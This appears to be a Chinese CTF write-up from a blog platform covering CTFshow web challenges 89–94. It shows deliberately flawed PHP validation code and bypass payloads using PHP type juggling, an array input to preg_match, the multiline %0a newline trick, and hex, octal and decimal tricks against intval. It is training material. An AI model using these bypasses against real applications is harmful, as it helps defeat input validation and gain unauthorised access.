91php,ctfshow之Web入门89-91

最新推荐文章于 2024-04-04 17:59:26 发布
最新推荐文章于 2024-04-04 17:59:26 发布
阅读量737 收藏 1
点赞数
文章标签: 91php

0x01Web89-91PHP特性payload

Web89

include("flag.php");

highlight_file(__FILE__);

if(isset($_GET['num'])){

$num = $_GET['num'];

if(preg_match("/[0-9]/", $num)){

die("no no no!");

}

if(intval($num)){

echo $flag;

}

}

//这里主要是对数字进行了过滤,并且又要GET请求传入的num变量为数字或数字串,关于preg_match()函数一个漏洞——>无法处理数组

Paylaod:?num[]=10

Web90

include("flag.php");

highlight_file(__FILE__);

if(isset($_GET['num'])){

$num = $_GET['num'];

if($num==="4476"){

die("no no no!");

}

if(intval($num,0)===4476){

echo $flag;

}else{

echo intval($num,0);

}

}

//强比较+intval函数

Payload:?num=4476e

Web91

show_source(__FILE__);

include('flag.php');

$a=$_GET['cmd'];

if(preg_match('/^php$/im', $a)){

if(preg_match('/^php$/i', $a)){

echo 'hacker';

}

else{

echo $flag;

}

}

else{

echo 'nonononono';

}

//这里有有两个条件,第一个需要是php,第二个又不可以php,不过有个差距就是m模式,/m代表匹配多行数据,这里可以通过%0a进行绕过

Payload:?cmd=%0aphp

Web92

include("flag.php");

highlight_file(__FILE__);

if(isset($_GET['num'])){

$num = $_GET['num'];

if($num==4476){

die("no no no!");

}

if(intval($num,0)==4476){

echo $flag;

}else{

echo intval($num,0);

}

}

//这里不能是4476,但是又要是4476,intval可以识别十六进制为十进制

Payload:?num=0x117c

Web93

include("flag.php");

highlight_file(__FILE__);

if(isset($_GET['num'])){

$num = $_GET['num'];

if($num==4476){

die("no no no!");

}

if(preg_match("/[a-z]/i", $num)){

die("no no no!");

}

if(intval($num,0)==4476){

echo $flag;

}else{

echo intval($num,0);

}

}

//ban掉了字母,但是可以用八进制绕过

Payload:?num=010574

Web94

include("flag.php");

highlight_file(__FILE__);

if(isset($_GET['num'])){

$num = $_GET['num'];

if($num==="4476"){

die("no no no!");

}

if(preg_match("/[a-z]/i", $num)){

die("no no no!");

}

if(!strpos($num, "0")){

die("no no no!");

}

if(intval($num,0)===4476){

echo $flag;

}

}

//不能以0开头了,这时候可以试试小数,intval只识别整数部分

Payload:?num=4476.0001

标签:__,Web,num,no,GET,echo,flag,89,91

来源: https://www.cnblogs.com/erR0Ratao/p/13693066.html

周行文
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
91-web漏洞之敏感信息漏洞挖掘.pdf
03-15
91-web漏洞之敏感信息漏洞挖掘
Atmel推出AT91CAP7A-STK入门级开发工具包
11-17
摘要:爱特梅尔公司ASIC产品市场总监Jay Johnson评论道:“配有ARM7和FPGA的开发板价格通常要数千美元。这款 399 美元的 CAP7 入门级开发工具包是首个配有‘ARM7加FPGA’ 的开发工具包,提供了评测设计和验证 CAP7 概念的低成本替代方案,而且无任何NRE费用和风险。  爱特梅尔公司 (Atmel:registered: Corporation) 宣布推出 AT91CAP7A-STK入门级开发工具包,是专为评测其基于ARM7:trade_mark: 处理器的CAP 可定制微控制器 (MCU) 系列而设的入门级工具。CAP7 可定制MCU可让设计人员从 “ARM7加FPGA” 设计转移到低一次性研发费用 (
攻防世界————fileclude(内含php伪协议菜鸟讲解)
weixin_62281892的博客
09-28 3952
文件包含以及涉及到的php伪协议
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1445
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
ctfshow-web入门-php特性
qq_43618536的博客
07-11 1228
ctfshow-web入门-php特性
ctfshow--web入门(web89-100)
qing_chuan_的博客
06-03 348
else {} }highlight_file()函数:将文本信息高亮显示,识别里面的关键字,然后加入css的一个样式,混合起来进行输出要传入一个u弱类型比较与flag.php,要绕过,可以在前面加入一些,文件路径(var/www/html),绝对路径(./)playload :?u = / var / www / html / flag . php或者?
CTFSHOW WEB入门 php特性 web89-
sinat_41572027的博客
07-11 383
CTFSHOW WEB入门 php特性 web89-100
CTFshow web入门web91-php3
weixin_74336671的博客
10-25 52
i表示匹配大小写,/m表示多行匹配 , "行首"元字符 (^) 仅匹配字符串的开始位置**,**而"行末"元字符 ($) 仅匹配字符串末尾,字符 ^ 和 $ 同时使用时,表示精确匹配,需要匹配到以php开头和以php结尾的字符串才会返回true。是要求我们多行匹配到php但是单行匹配不到php。//%0a表示换行符,由题可知可多次使用此符号。
Ctfshow web入门-php特性-web89-91 WP
qq_45427131的博客
05-25 993
web89 查看代码 preg_match过滤0-9,即发现有0-9,就输出no no no 然而intval函数的作用是返回变量的整数值,两者相互矛盾 这里可以通过数组绕过,构造payload: ?num[]= 成功获取flag web90 查看源码,第一个if是验证num是否被设置,第二个if验证num是否是4476,如果是,就输出no no no ,第三个if验证num取整后是否等于4476 看到取整,还不好做吗~,直接输入小数取整绕过第二个if的验证 payload?num=4476.1
CTFshow php特性 web91
Kradress的博客
12-13 782
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:16:09 # @link: https://ctfer.com */ show_source(__FILE__); include('flag.php'); $a=$_
webserver-at91sam9260-ek-iar-.zip_at91sam9260 sdram_uip web
09-20
AT91SAM9260-EK 代码,SDRAM中运行,uIP WEB Server,IAR5.2开发环境
JGJ 91-2019 科研建筑设计标准
04-10
JGJ 91-2019 科研建筑设计标准
91SB1-1(2005)暖气工程2图集
07-02
91SB1-1(2005)暖气工程2图集
三菱电梯维修调试资料:KCD-91X故障代码.docx
06-29
三菱电梯维修调试资料:KCD-91X故障代码.docx
ctfshow web入门 php特性 web89--web107
2301_81040377的博客
04-04 1655
for循环里面的意思是取随机数1到36之间一个数,1到37之间一个数,1到38一个数,直到1到877,然后把每次拿到的随机数追加到allow数组里面。//如果GET传参flag的值=flag则将cookie的值代替flag中的值。//如果使用GET传参,则使用POST传参来代替。//如果GET传参HTTP_FLAG的值为flag则输出$flag。=b,但是md5编码之后又要相等。
《CTFshow-Web入门》10. Web 91~110
学习学习学习......
10-01 7944
PHP 特性之 preg_match(),换行解析漏洞、intval(),== 与 === 的区别、md5()、in_array()、三元运算、赋值运算【=】优先级、ReflectionClass($class) 建立反射类、is_numeric() 特性,call_user_func() 与 hex2bin() 利用,PHP 伪协议、sha1()、变量覆盖、parse_str() 利用、ereg() 截断漏洞、__toString() 与类触发、FilesystemIterator 类,getcwd()。
ctfshow-web91(php特性)
m0_62094846的博客
01-13 656
正则:会出现/ / 有时候也会有^ $ 考察了preg_match的/m模式 im模式是可以匹配很多行 i模式只能匹配一行 %0a换行,相当于enter <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:16:09 # @link: http
ctfshow
m0_73867210的博客
02-20 135
一、web89 看了下源码,是要传一个num,但是0-9都被过滤了 有两函数不认识搜一下 然后在前面见过preg_match是一个正则匹配式,又去了解了一下,数字被过滤了,那可以考虑一下数组绕过(看的别人的,hhh) 随便传一个数组得到flag 二、web90 分析代码,和刚才那个差不多,但是出现了一个===,还有intval函数的用法还是不太会,再查一下 传入八进制得到flag 试一下字母,也可以得
grpcio-1.44.0-cp39-cp39-manylinux2010_x86_64.whl
最新发布
05-31
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
ctfshow web373
09-01
对于CTFShow的题目,很抱歉我无法提供具体答案。但是我可以帮助你理解和解决类似的Web安全问题。Web373可能是一个与Web安全相关的挑战题目,可以通过分析和利用漏洞来获取答案。 你可以尝试以下方法来解决Web373或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值